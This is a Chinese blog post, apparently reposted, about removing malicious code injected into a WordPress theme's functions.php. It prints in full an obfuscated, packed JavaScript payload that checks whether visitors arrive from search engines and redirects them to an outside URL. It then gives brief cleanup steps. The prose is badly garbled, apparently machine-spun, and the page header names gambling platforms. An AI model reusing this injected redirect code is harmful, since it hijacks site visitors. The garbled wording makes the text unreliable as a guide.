wordpress被挂马及清除可疑的植入代码的方法

  • 时间:
  • 浏览:0
  • 来源:3分快3网投平台-5分11选5投注平台_5分3D娱乐平台
作者:匿名 hihi 来源:博客吧 浏览: 2012-4-23 16:16:150 字号:大 中 小

[摘要]WordPress博客被挂马或植入可疑代码,相信有不少站长遇到过吧,本文讲述了了博客吧博主清除可疑的植入代码的土辦法 ,希望对亲戚亲戚朋友有所帮助。

  我有个用wordpress搭建的CMS网站前些日子被浏览器报受攻击了,谷歌的网站管理也工具也提示,还给出了可疑代码和受影响的文章的地址,前一天被攻击的经历,那次与这次不同,就说 挂了有哪几个黑链,这次不同,以后没办法手动找代码清除了,刚始于网上搜了搜相关事例,你这个 博主是在数据库里清除的,但我的行不通,机会我的问題找不到数据库,而在functions.php文件。

清除wordpress挂马代码:

1.先是登陆谷歌网站管理工具,在“故障诊断”下选者“恶意软件”进入占据 问題的网址,随便点击曾经有问題的网站,谷歌网站管理员工具就会给出“可疑的植入代码”

<script language="JavaScript">eval(function(p,a,c,k,e,r){e=f

unction(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?Strin

g.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,Str

ing)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e

]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.re

place(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('e r=

x.9,t="",q;4(r.3("m.")!=-1)t="q";4(r.3("7.")!=-1)t="q";4(r.3

("8.")!=-1)t="p";4(r.3("a.")!=-1)t="q";4(r.3("f.")!=-1)t="g"

;4(r.3("j.")!=-1)t="q";4(t.6&&((q=r.3("?"+t+"="))!=-1||(q=r.

3("&"+t+"="))!=-1))B.C="v"+"w"+":/"+"/A"+"b"+"k"+"5"+"h."+"c

"+"z/s"+"u"+"5"+"h.p"+"d?"+"t"+"y=1&t"+"i"+"l="+r.n(q+2+t.6)

.o("&")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referr

er|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|s

ubstring|split||||||ea|ht|tp|document|||go|window|location'.

split('|'),0,{}))</script>

注:不须在浏览器中执行!

2.在被挂马博客当前主题的functions.php文件中的,找到与谷歌网站管理员工具给出的可疑的植入代码相同的代码,以后把整个php励志的话 删除掉,我找到的整句代码如下:(深蓝色每项)

3.以后保存文件。

注:没办法选者的博主,能要能 搞定当前主题的备份主题的functions.php文件替换掉曾经 的。此外删除掉后,在谷歌网站管理员工具中申请审核,以后chrome浏览器都会报警告。

PS:我对挂马和代码你这个 了解都会很清楚,就说 参照谷歌网站管理工具给出的相应的可疑植入代码进行清理,合理性有待考察。

Wordpress下载:

本文转自:http://www.boke8.net/wordpress-bei-gua-ma.html

sssss
Tags: wordpress挂马   wordpress教程   wordpress下载  
责任编辑:cc120